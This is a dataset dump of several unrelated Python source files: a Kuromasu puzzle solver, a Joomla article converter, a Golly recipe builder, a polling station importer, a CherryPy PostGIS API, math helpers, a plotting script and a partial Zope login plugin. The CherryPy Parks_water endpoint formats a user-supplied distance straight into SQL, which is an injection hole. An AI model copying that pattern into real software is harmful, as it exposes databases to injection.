celda en la posicion i,j segun su numero.\n decisiones=[[],[],[],[]] #El formato son 4 listas para las 4 direcciones posibles, donde las celdas estan ordenadas segun cercania,\n if tablero[i][j]!='0': #siendo la primera la más cerca en tal direccion, y la ultima la mas lejana en dicha direccion\n for l in range(1,int(tablero[i][j])): #Debe ocuparse la funcion limpiar_lista_sublistas_vacias para eliminar las listas de direcciones\n if validar_celda_tablero(tablero,i+l,j): #en las que no haya posibilidades de movimiento\n decisiones[0].append([i+l,j])\n for l in range(1,int(tablero[i][j])):\n if validar_celda_tablero(tablero,i-l,j):\n decisiones[1].append([i-l,j])\n for l in range(1,int(tablero[i][j])):\n if validar_celda_tablero(tablero,i,j+l):\n decisiones[2].append([i,j+l])\n for l in range(1,int(tablero[i][j])):\n if validar_celda_tablero(tablero,i,j-l):\n decisiones[3].append([i,j-l])\n decisiones=limpiar_lista_sublistas_vacias(decisiones)\n return decisiones\n\ndef eliminar_celda_de_decision(celda_eliminar,decisiones): #elimina celda elegida de la lista de caminos, funcion necesaria por el formato de las decisiones\n for camino in decisiones:\n for celda in camino:\n if celda==celda_eliminar:\n indice_camino=decisiones.index(camino)\n decisiones[0],decisiones[indice_camino]=decisiones[indice_camino],decisiones[0]\n if len(decisiones)==1:\n return [decisiones[0][1:]]\n return [decisiones[0][1:]]+decisiones[1:]\n\ndef limpiar_lista_sublistas_vacias(lista): #elimina sublistas que sean vacias ([]) si estas existen\n while [] in lista:\n lista.pop(lista.index([]))\n return lista\n\ndef combinaciones_posibles(tablero,numero,lista_decisiones,combinacion_solucion=None,i=0,lista_combinaciones=[]): #retorna lista con tuplas que contienen las celdas que resuelven el numero,\n if i==0 and combinacion_solucion is None: #recibe:\n combinacion_solucion=[0]*(numero) #--->numero del que se buscan las combinaciones, restado en\n lista_combinaciones=[] # uno, pues numero-1 es la cantidad de celdas blancas\n if numero==0: #necesarias aparte de la que contiene al numero\n lista_combinaciones.append(tuple(combinacion_solucion)) #--->resultado de la funcion generar_decisiones en la posicion\n return #del numero\n for decision in lista_decisiones:\n combinacion_solucion[i]=decision[0]\n (combinaciones_posibles(tablero,numero-1,limpiar_lista_sublistas_vacias(eliminar_celda_de_decision(decision[0],lista_decisiones)),combinacion_solucion,i+1,lista_combinaciones))\n lista_decisiones=lista_decisiones[1:]\n return lista_combinaciones\n\ndef traducir_combinaciones_posibles(resultado_combinaciones_posibles): #retorna lista con listas que contienen las celdas que resuelven cada numero,\n comb=[] #o sea todas las posibilidades de casillas blancas para satisfacer la regla 1 del juego, recibe el resultado\n for tupla in resultado_combinaciones_posibles: #de la funcion combinaciones_posibles.\n l=list(tupla)\n comb.append(l)\n return comb\n\ndef solucion_celda(tablero,i,j): #retorna la combinacion de celdas negras que necesita una posicion para ser resuelta (lista con todas las combinaciones posibles)\n celdas_negras_cada_solucion=[]\n soluciones=(traducir_combinaciones_posibles(combinaciones_posibles(tablero,int(tablero[i][j])-1,generar_decisiones(tablero,i,j))))\n for solucion in soluciones:\n celdas_negras=[]\n i_min=min(solucion[n][0] for n in range(len(solucion)))\n if i_min>i:\n i_min=i\n if validar_celda_tablero(tablero,i_min-1,j):\n celdas_negras.append([i_min-1,j])\n if tablero[i_min-1][j]!='0' and tablero[i_min-1][j]!='X':\n continue\n i_max=max(solucion[n][0] for n in range(len(solucion)))\n if i_maxj:\n j_min=j\n if validar_celda_tablero(tablero,i,j_min-1):\n celdas_negras.append([i,j_min-1])\n if tablero[i][j_min-1]!='0' and tablero[i][j_min-1]!='X':\n continue\n j_max=max(solucion[n][1] for n in range(len(solucion)))\n if j_max=10:\n print('\\nSu tablero es de tamaño',len(juego.tablero),'por lo que la resolucion podría tardarse,\\n(ha sido testeado un tablero de 17x17, que se resolvio en aproximadamente\\n20 minutos y uno de 11x11 se resolvio en medio minuto aproximadamente) ')\n juego.limpiarTablero()\n solucion=(juego.traducirSolucion(juego.resolver()))\n for negra in solucion:\n juego.agregarNegra(negra[0],negra[1])\n print('\\nSolucion:')\n juego.dibujarTablero()\n juego.volverEstado_inicial()\n archivo_guardar=open(archivo,'w')\n for fila in juego.tablero:\n for columna in fila:\n archivo_guardar.write(columna)\n archivo_guardar.write(' ')\n archivo_guardar.write('\\n')\n print('Se ha guardado el tablero en su estado inicial, ¡vuelve pronto!\\n')\n jugar=False\n elif eleccion_menu=='4':\n archivo_guardar=open(archivo,'w')\n for i in range(len(juego.tablero)):\n for j in range(len(juego.tablero)):\n if [i,j] in juego.celdas_negras:\n archivo_guardar.write('X')\n archivo_guardar.write(' ')\n elif juego.tablero[i][j]!='0' and juego.tablero[i][j]!='X':\n archivo_guardar.write(juego.tablero[i][j])\n archivo_guardar.write(' ')\n else:\n archivo_guardar.write('0')\n archivo_guardar.write(' ')\n archivo_guardar.write('\\n')\n print('Se han guardado tus respuestas en el archivo. Gracias por jugar.\\n¡vuelve pronto!\\n')\n jugar=False\n elif eleccion_menu=='5':\n juego.volverEstado_inicial()\n elif eleccion_menu=='6':\n juego.limpiarTablero()\n else:\n juego.agregarNegra(celda.split(',')[0],celda.split(',')[1])\n","sub_path":"Tarea_3/KuromasuJuego.py","file_name":"KuromasuJuego.py","file_ext":"py","file_size_in_byte":25661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563824315","text":"import io,json,os\n\nfolder = \"../data/articles\"\nfile = \"articles_20161017.json\"\ntags = [[\"title\"],[\"featured\"],[\"introtext\",\"content_intro\"],[\"fulltext\",\"content_main\"],[\"id\"],[\"created_by\",\"author\"],[\"access\",\"public\"],[\"publish_up\",\"publish_start\"],[\"publish_down\",\"publish_stop\"],[\"modified\",\"publish_modified\"],[\"created\",\"publish_created\"],[\"alias\"]]\nshortlist = {\"articles\":{},\"featured\":[],\"gallery\":[]}\n\n#read file\nwith io.open(file, 'r') as file:\n content = file.read()\ncontent = content[(content.index(\"[\")):]\ncontent = content.replace(\"\\\\r\",\"\").replace(\"\\\\n\",\"\")\ncontent = content.replace(\"btn-default\",\"btn-secondary\")\n\nlevel = 0\ncount = 0\nparts = []\nmaxid = 0\n\n#split in parts\nfor i in range(1, len(content)-1):\n if content[i] == \"{\":\n level = level + 1\n elif content[i] == \"}\":\n level = level - 1\n elif (content[i] == \",\") and (level == 0):\n count = count + 1\n continue\n \n while len(parts) <= count:\n parts.append(\"\")\n parts[count] += content[i]\n\n#parse\ntry:\n os.mkdir(folder)\nexcept WindowsError:\n print(\"no new folder\")\n\nfor i in range(0, len(parts)):\n\n article = json.loads(parts[i])\n print(article[\"id\"])\n maxid = max(maxid, int(article[\"id\"]))\n shortlist[\"articles\"][article[\"alias\"]] = int(article[\"id\"])\n if article[\"featured\"]!=\"0\":\n shortlist[\"featured\"].append(int(article[\"id\"]))\n newarticle = {\"comments\":True,\"permanent_alias\":True,\"system\":False,\"notified\":True}\n for key in article:\n for tag in tags:\n if key == tag[0]:\n if len(tag) == 1:\n newtag = tag[0]\n elif len(tag) == 2:\n newtag = tag[1]\n newarticle[newtag] = article[key]\n \n if newtag == \"id\" or newtag == \"author\":\n newarticle[newtag] = int(article[key])\n if newtag == \"public\":\n newarticle[newtag] = bool(article[key])\n if newtag == \"featured\":\n del newarticle[newtag]\n if newtag == \"alias\":\n newarticle[newtag] = article[key].replace(\"\\u00e4\",\"ae\").replace(\"\\u00f6\",\"oe\").replace(\"\\u00fc\",\"ue\")\n \n \n with open(folder + \"/\" + str(newarticle[\"id\"]).zfill(6) + \".json\",\"w+\") as f:\n f.write(json.dumps(newarticle))\n\nshortlist[\"count\"] = maxid \nwith open(folder + \"/index.json\",\"w+\") as f:\n f.write(json.dumps(shortlist)) ","sub_path":"extra/implementArticles.py","file_name":"implementArticles.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309520926","text":"import golly as g \nimport copy\nfrom os import path\n\nglider_cells = g.parse(\"3o$o$bo!\")\nblock_cells = g.parse(\"2o$2o!\")\n\nclass RecipeConstructor(object):\n\t\n\tdef __init__(self):\n\t\tself.blockX = 0\n\t\tself.blockY = 0\n\t\tself.sequence = []\n\t\tself.recipe = []\n\t\tself.BlockMoveTableEven = {}\n\t\tself.BlockMoveTableOdd = {}\n\t\tself.WssCreator = []\n\t\tself.minD = 0\n\t\tself.maxY = 0\n\t\tself.maxX = 0\n\t\t\n\tdef Reset(self):\n\t\tself.blockX = 0\n\t\tself.blockY = 0\n\t\tself.sequence = []\n\t\tself.recipe = []\n\t\t\n\tdef AddWss(self, idx):\n\t\tdelta = self.blockY - self.blockX\n\t\tdx = self.WssCreator[idx][0]\n\t\tdy = self.WssCreator[idx][1]\n\t\trec = self.WssCreator[idx][2]\n\t\t\n\t\tfor i in rec:\n\t\t\tself.recipe.append(i + delta)\n\t\t\n\t\tself.sequence.append((idx))\n\t\tself.blockX += dx\n\t\tself.blockY += dy\n\t\t\n\tdef Goto(self, x, y):\n\t\t\n\t\tdx = x - self.blockX\n\t\tdy = y - self.blockY\n\t\t\n\t\t#g.note(str((x, y, self.blockX, self.blockY, dx, dy)))\n\t\t\n\t\tif dx >= self.minD and dx <= self.maxX and abs(dy) <= self.maxY:\n\t\t\t\n\t\t\td = min(-3, dx)\n\t\t\tself.MoveBy(d, dx, dy)\n\t\t\t\n\t\telse: \n\t\t\t\n\t\t\tif dy != 0:\n\t\t\t\tdx_dy = int(self.maxY * float(dx) / float(abs(dy)) + 0.5)\n\t\t\telse:\n\t\t\t\tdx_dy = 0 \n\t\t\t\t\n\t\t\tif dy != 0 and abs(dy) > self.maxY and dx_dy <= self.maxX and dx_dy >= self.minD:\n\t\t\t\n\t\t\t\td = min(-3, dx_dy)\n\t\t\t\tself.MoveBy(d, dx_dy, self.maxY * (dy / abs(dy)))\n\t\t\t\tself.Goto(x, y)\n\t\t\t\t\n\t\t\telif dx < self.minD:\n\t\t\t\t\n\t\t\t\tdy_dx = int(self.minD * float(dy) / float(dx) + 0.5)\n\t\t\t\tself.MoveBy(self.minD, self.minD, dy_dx)\n\t\t\t\tself.Goto(x, y)\n\t\t\t\n\t\t\telif dx > self.maxX:\n\t\t\t\t\n\t\t\t\tdy_dx = int(self.maxX * float(dy) / float(dx) + 0.5)\n\t\t\t\tself.MoveBy(-3, self.maxX, dy_dx)\n\t\t\t\tself.Goto(x, y)\n\t\t\t'''\n\t\tif dx < -26:\n\t\t\tif dy >= 101:\n\t\t\t\tself.MoveBy(-23, -23, 101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -101:\n\t\t\t\tself.MoveBy(-23, -23, -101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif abs(dy) >= abs(dx):\n\t\t\t\n\t\t\t\tif dy < 0:\n\t\t\t\t\tself.MoveBy(-23, -23, -23)\n\t\t\t\telse:\n\t\t\t\t\tself.MoveBy(-23, -23, 23)\n\t\t\t\t\t\n\t\t\t\tself.Goto(x, y)\n\t\t\telse:\n\t\t\t\tself.MoveBy(-23, -23, 1)\n\t\t\t\tself.Goto(x, y)\n\t\t\t\n\t\telif dx < -23:\n\t\t\tif dy >= 101:\n\t\t\t\tself.MoveBy(-11, -11, 101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -101:\n\t\t\t\tself.MoveBy(-11, -11, -101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telse: \n\t\t\t\tself.MoveBy(-11, -11, 1)\n\t\t\t\tself.Goto(x, y)\n\t\t\n\t\telif dx <= 50:\n\t\t\t\n\t\t\td = dx\n\t\t\tdelta = 0 \n\t\t\t\n\t\t\tif d > -3:\n\t\t\t\td = -3\n\t\t\t\n\t\t\tif d < -3:\n\t\t\t\tdelta = d\n\t\t\t\t\n\t\t\tif dy >= 100:\n\t\t\t\tself.MoveBy(d, delta, 100 + delta)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -100:\n\t\t\t\tself.MoveBy(d, delta, -100 - delta)\n\t\t\t\tself.Goto(x, y)\n\t\t\telse: \n\t\t\t\tself.MoveBy(d, dx, dy)\n\t\t\t\t\n\t\telse:\n\t\t\t\n\t\t\tif dy >= 100:\n\t\t\t\tself.MoveBy(-3, 50, 100)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -100:\n\t\t\t\tself.MoveBy(-3, 50, -100)\n\t\t\t\tself.Goto(x, y)\n\t\t\telse: \n\t\t\t\tself.MoveBy(-3, 50, 0)\n\t\t\t\tself.Goto(x, y)\n\t'''\n\tdef DeleteBlock(self):\n\t\tdelta = self.blockY - self.blockX\n\t\t\n\t\tif delta % 2 == 1:\n\t\t\tdelta -= 1\n\t\t\t\n\t\tself.recipe.append(delta)\n\n\tdef MoveBy(self, d, dx, dy):\n\t\n\t\tdelta = self.blockY - self.blockX\n\t\tisEven = True\n\t\t\n\t\tif (self.blockY + self.blockX) % 2 == 1:\n\t\t\tdelta -= 1\n\t\t\tisEven = False\n\t\t\t\n\t\tif isEven:\n\t\t\trec = self.BlockMoveTableEven[(d, dx, dy)]\n\t\telse:\n\t\t\trec = self.BlockMoveTableOdd[(d, dx, dy + 1)]\n\t\t\n\t\tfor i in rec:\n\t\t\tself.recipe.append(i + delta)\n\t\t\n\t\tself.blockX += dx\n\t\tself.blockY += dy\n\t\tself.sequence.append((d, dx, dy))\n\t\t\n\tdef Init(self, pathEven, pathOdd, pathWss):\n\t\t\n\t\tself.LoadMoveTable(pathEven, True)\n\t\tself.LoadMoveTable(pathOdd, False)\n\t\tself.LoadWssTable(pathWss)\n\n\tdef LoadMoveTable(self, path, isEven):\n\t\tins = open(path, \"r\" )\n\t\tarray = []\n\t\t\n\t\tfor line in ins:\n\t\t\tvals = line.split(\":\")\n\t\t\t\n\t\t\tvals[0] = vals[0].replace(\"m\", \"\")\n\t\t\tvals[0] = vals[0].split(\",\")\n\t\t\t\n\t\t\td = int(vals[0][0])\n\t\t\tx = int(vals[0][1])\n\t\t\ty = int(vals[0][2])\n\t\t\t\n\t\t\tself.minD = min(self.minD, d)\n\t\t\tself.maxY = max(self.maxY, abs(y))\n\t\t\tself.maxX = max(self.maxX, x)\n\t\t\t\n\t\t\t\n\t\t\tvals[1] = vals[1].replace(\"E\", \"\").replace(\"\\n\", \"\").replace(\" \", \"\")\n\t\t\tvals[1] = vals[1].split(\",\")\n\t\t\t\n\t\t\tif vals[1][0] != 'X' and vals[1][0] != '':\n\t\t\t\tfor i in xrange(0, len(vals[1])):\n\t\t\t\t\tvals[1][i] = int(vals[1][i])\n\t\t\t\n\t\t\tif isEven:\n\t\t\t\tself.BlockMoveTableEven[(d, x, y)] = vals[1]\n\t\t\telse:\n\t\t\t\tself.BlockMoveTableOdd[(d, x, y)] = vals[1]\n\t\t\t\n\t\tins.close()\n\t\tself.maxY -= 2\n\t\tself.maxX -= 1\n\t\t\n\tdef LoadWssTable(self, path):\n\t\tins = open(path, \"r\" )\n\t\tarray = []\n\t\t\n\t\tfor line in ins:\n\t\t\tvals = line.split(\":\")\n\t\t\t\n\t\t\tvals[0] = vals[0].replace(\"m\", \"\")\n\t\t\tvals[0] = vals[0].split(\",\")\n\t\t\t\n\t\t\tx = int(vals[0][0])\n\t\t\ty = int(vals[0][1])\n\t\t\t\n\t\t\tvals[1] = vals[1].replace(\"E\", \"\").replace(\"\\n\", \"\").replace(\" \", \"\")\n\t\t\tvals[1] = vals[1].split(\",\")\n\t\t\t\n\t\t\tfor i in xrange(0, len(vals[1])):\n\t\t\t\tvals[1][i] = int(vals[1][i])\n\t\t\n\t\t\tself.WssCreator.append([x, y, vals[1]])\t\n\t\t\t\n\t\tins.close()\n\t\t\ndef FindBestDx(recipes):\n\n\tbestX = -1\n\tbestY = -1\n\tbestRation = -10000\n\tfor x in xrange(-24, -4):\n\t\tfor y in xrange(-50, 51):\n\t\t\tval = recipes.BlockMoveTableEven[(-23, x, y)]\n\t\t\tif val[0] == 'X' or val[0] == '':\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif -x / len(val) > bestRation:\n\t\t\t\tbestRation = -x / len(val)\n\t\t\t\tbestX = x\n\t\t\t\tbestY = y\n\n\tg.show(str((bestX, bestY)))\n\t\n\n\n","sub_path":"Code/RecipeManager.py","file_name":"RecipeManager.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235817925","text":"from data_collection.management.commands import BaseShpStationsShpDistrictsImporter\n\n\"\"\"\nLichfield publish their data on data.gov.uk as zipped shp files\n\nI've uploaded the data to Amazon S3 for import purposes\n\nAdditionally there's a hashes only scraper at\nhttps://morph.io/wdiv-scrapers/DC-PollingStations-Lichfield\npolling the URLs to look for changes.\n\"\"\"\n\nclass Command(BaseShpStationsShpDistrictsImporter):\n srid = 27700\n council_id = 'E07000194'\n districts_name = 'local.staffordshire.2017-05-04/Lichfield District Council Polling Districts Shapefile/Lichfield_District_Council_Polling_Districts'\n stations_name = 'local.staffordshire.2017-05-04/LDC_Polling_Stations_Shapefile/Lichfield_District_Council_Polling_Station_Locations.shp'\n elections = ['local.staffordshire.2017-05-04']\n\n def district_record_to_dict(self, record):\n return {\n 'internal_council_id': str(record[4]).strip(),\n 'name': str(record[4]).strip(),\n 'polling_station_id': str(record[4]).strip(),\n }\n\n def station_record_to_dict(self, record):\n address = \"\\n\".join([\n str(record[1]).strip(),\n str(record[4]).strip(),\n ])\n postcode = str(record[5]).strip()\n codes = [record[9].strip(), record[10].strip(), record[11].strip()]\n\n stations = []\n for code in codes:\n if code != b'':\n stations.append({\n 'internal_council_id': str(code),\n 'postcode' : postcode,\n 'address' : address,\n })\n return stations\n","sub_path":"polling_stations/apps/data_collection/management/commands/import_lichfield.py","file_name":"import_lichfield.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58283283","text":"import os\nimport os.path\nimport psycopg2\nimport json\nimport cherrypy\n\n\nclass DateHelper(object):\n @cherrypy.expose\n def index(self):\n return open('index.html')\n\n\n@cherrypy.expose\nclass Newsagents(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with MHDtickets as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'newsagent'\n union\n select name, amenity, shop, way from planet_osm_point\n where shop = 'newsagent')\n select ST_AsGeoJSON(st_transform(m.way, 4326))::json from MHDtickets m\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Supermarkets(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with supermarkets as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'supermarket'\n union\n select name, amenity, shop, way from planet_osm_point\n where shop = 'supermarket')\n select ST_AsGeoJSON(st_transform(s.way, 4326))::json from supermarkets s\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Flowers(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with flowers as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'florist'\n union\n select name, amenity, shop, way from planet_osm_point\n where shop = 'florist')\n select ST_AsGeoJSON(st_transform(f.way, 4326))::json from flowers f\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Gas(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with gas as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'fuel'\n union\n select name, amenity, shop, way from planet_osm_point\n where amenity = 'fuel')\n select ST_AsGeoJSON(st_transform(g.way, 4326))::json from gas g\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Parks(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with walkpaths as (\n select name, way, highway from public.planet_osm_line\n where highway = 'path'\n or highway = 'footway'\n ), parks as (\n select name, way, leisure from public.planet_osm_polygon\n where leisure = 'park'\n )\n select ST_AsGeoJSON(ST_Transform(prk.way, 4326))::json from walkpaths p, parks prk\n where st_intersects(p.way, prk.way)\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Parks_water(object):\n\n def GET(self, distance=None):\n if distance is None:\n distance = 0\n distance = str(distance)\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with rivers as (\n select name, water, waterway, way from public.planet_osm_line\n where water != ''\n or waterway != ''\n union\n select name, water, waterway, way from public.planet_osm_polygon\n where water != ''\n or waterway != ''\n ),\n parks as (\n select name, way, leisure from public.planet_osm_polygon\n where leisure = 'park'\n )\n select ST_AsGeoJSON(ST_Transform(p.way, 4326))::json from rivers r, parks p\n where ST_DWithin(p.way, r.way, '{0}')\n \"\"\".format(distance))\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\ncherrypy.tree.mount(\n Newsagents(), '/api/newsagents',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Supermarkets(), '/api/supermarkets',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Flowers(), '/api/flowers',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Gas(), '/api/gas',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Parks(), '/api/parks',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Parks_water(), '/api/parks_water',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\nif __name__ == '__main__':\n conf = {\n '/': {\n 'tools.sessions.on': True,\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n },\n '/static': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.dir': './public'\n }\n }\n\n webapp = DateHelper()\n\n cherrypy.quickstart(webapp, '/', conf)\n","sub_path":"cherry.py","file_name":"cherry.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534656097","text":"\n# Devuelve true si n es primo (sin conocimiento previo)\ndef is_prime_number(n):\n if n < 2:\n return False\n end = int(n**0.5)\n for i in range(2, end+1):\n if n%i == 0:\n return False\n return True\n\n# Devuelve true si n es primo\n# Se apoya en prime_list, que contiene los primos descubiertos\n# hasta el momento\ndef is_prime_from_list(n, prime_list):\n if len(prime_list) == 0:\n return True\n for p in prime_list:\n if n%p == 0:\n return False\n return True\nprime_list = []\n\n\n# Genera todas las permutaciones posibles entre los digitos de r\ndef get_permutations(r):\n if len(r) == 1:\n return [r]\n output = []\n for i in range(0,len(r)):\n resto = r[0:i] + r[i+1:len(r)]\n comb = get_permutations(resto)\n for p in comb:\n l = [r[i]] + p\n # No añade duplicados\n if l not in output:\n output.append(l)\n return output\n\n# Convierte las permutaciones a enteros\ndef array_to_str(array: list) -> int:\n array_n = [str(n) for n in array]\n return int(''.join(array_n))\n\n# Devuelve true si el elemento x está en arr\n# busqueda binaria\ndef is_present(arr, x): \n low = 0\n high = len(arr) - 1\n mid = 0\n if x < arr[0] or x > arr[len(arr)-1]:\n return False\n while low <= high: \n mid = (high + low) // 2\n if x == arr[mid]:\n return True\n if arr[mid] < x: \n low = mid + 1\n elif arr[mid] > x: \n high = mid - 1\n return False\n\n# Devuelve una lista de factores unicos de number\ndef get_factores(number):\n factores = []\n resto = number\n for i in range(2,int(sqrt(number)+1)):\n if resto % i == 0:\n factores.append(i)\n while resto % i == 0:\n resto = resto / i\n if resto == 1:\n return factores\n factores.append(int(resto))\n return factores","sub_path":"auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311906675","text":"import csv\nfrom code.classes.battery import Battery\nfrom code.classes.house import House\nfrom code.classes.district import District\nimport matplotlib.pyplot as plt\n\n\n\n\nlist_house_objects = []\nlist_battery_objects = []\n\nwith open('data/Huizen&Batterijen/district_1/district-1_batteries.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n id_loop = 1\n for row in csv_reader:\n if line_count == 0:\n print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(f'Coordinates are: {row[0]}, Capacity is: {row[1]}.')\n\n coordinates = row[0]\n capacity = row[1]\n list_coordinates = coordinates.split(\",\")\n x_coordinate = int(list_coordinates[0])\n y_coorinate = int(list_coordinates[1])\n\n\n b = Battery(id_loop, x_coordinate, y_coorinate, capacity)\n list_house_objects.append(b)\n\n line_count += 1\n id_loop += 1\n\n print(f'Processed {line_count} lines.')\n\nwith open('data/Huizen&Batterijen/district_1/district-1_houses.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n #print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(f'Coordinates are: {row[0]}, {row[1]}. Output is: {row[2]}.')\n\n x_coordinate = row[0]\n y_coorinate = row[1]\n output = float(row[2])\n print(output)\n\n h = House(x_coordinate, y_coorinate, output)\n list_house_objects.append(h)\n line_count += 1\n\nd = District(list_house_objects,list_battery_objects)\n\n\n#Plotting the batteries and houses\n\n#Creating an empty plot\nx = range(60)\ny = range(60)\nplt.plot(x,y)\nplt.show()\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n\n#Adding batteries\nbatteries = d.batteries\nfor battery in batteries:\n battery.x_coordinate = x\n battery.y_coordinate = y\n print(x, y)\n ax1.scatter(x, y, c=\"r\", label='batteries')\n\n#Adding houses\nhouses = d.houses\nfor house in houses:\n house.x_coordinate = x\n house.y_coordinate = y\n ax1.scatter(x, y, c=\"b\", label='houses')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330899879","text":"##############################################################################\n#\n# Copyright (c) 2005 Zope Corporation. All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Visible Source\n# License, Version 1.0 (ZVSL). A copy of the ZVSL should accompany this\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\nimport sha\n\nimport zope.publisher.interfaces.http\n\nimport zope.app.authentication.session\nimport zope.session.interfaces\nimport zope.app.http.httpdate\n\nclass CredentialsDontMakeSecurityDeclarationsForMe:\n # Credentials class. We use this rather than a dict to prevent\n # leakage to untrusted code. As long as no one is fool enough to\n # make security declarations for this then untrusted code will get\n # forbidden errors trying to access data.\n\n domain = None\n \n def __init__(self, **kw):\n self.__dict__.update(kw)\n\n\nclass SessionCredentialsPlugin(\n zope.app.authentication.session.SessionCredentialsPlugin,\n ):\n\n _fields = ('login', 'login.login'), ('password', 'login.password')\n\n def extractCredentials(self, request):\n \"\"\"Extracts credentials from a session if they exist.\"\"\"\n\n if not zope.publisher.interfaces.http.IHTTPRequest.providedBy(request):\n return None\n\n data = dict((k, request[rk]) for (k, rk) in self._fields\n if rk in request)\n credentials = None\n\n session = zope.session.interfaces.ISession(request)\n\n if len(data) == len(self._fields):\n data['sha'] = sha.new(data.pop('password').encode('utf-8')\n ).hexdigest()\n self.save_credentials(data, session)\n data['logging_in'] = True\n return self._update_cookie(request, data)\n\n sessionData = session.get('zope.app.authentication.browserplugins')\n if sessionData:\n return self._update_cookie(request,\n sessionData.get('credentials').__dict__)\n\n return None\n\n def _update_cookie(self, request, credentials):\n if credentials:\n domain = credentials.get('domain') \n if domain and (request.cookies.get('login.domain') != domain):\n request.response.setCookie(\n 'login.domain', domain,\n expires = 'Wed, 01-Jan-3000 00:00:00 GMT',\n )\n credentials['request-annotations'] = request.annotations\n return credentials\n \n def save_credentials(self, credentials, session=None, request=None):\n if session is None:\n session = zope.session.interfaces.ISession(request)\n sessionData = session['zope.app.authentication.browserplugins']\n sessionData['credentials'] = (\n CredentialsDontMakeSecurityDeclarationsForMe(**credentials)\n )\n\n def logout(self, request):\n self.save_credentials({}, request=request)\n \n def challenge(self, request):\n if 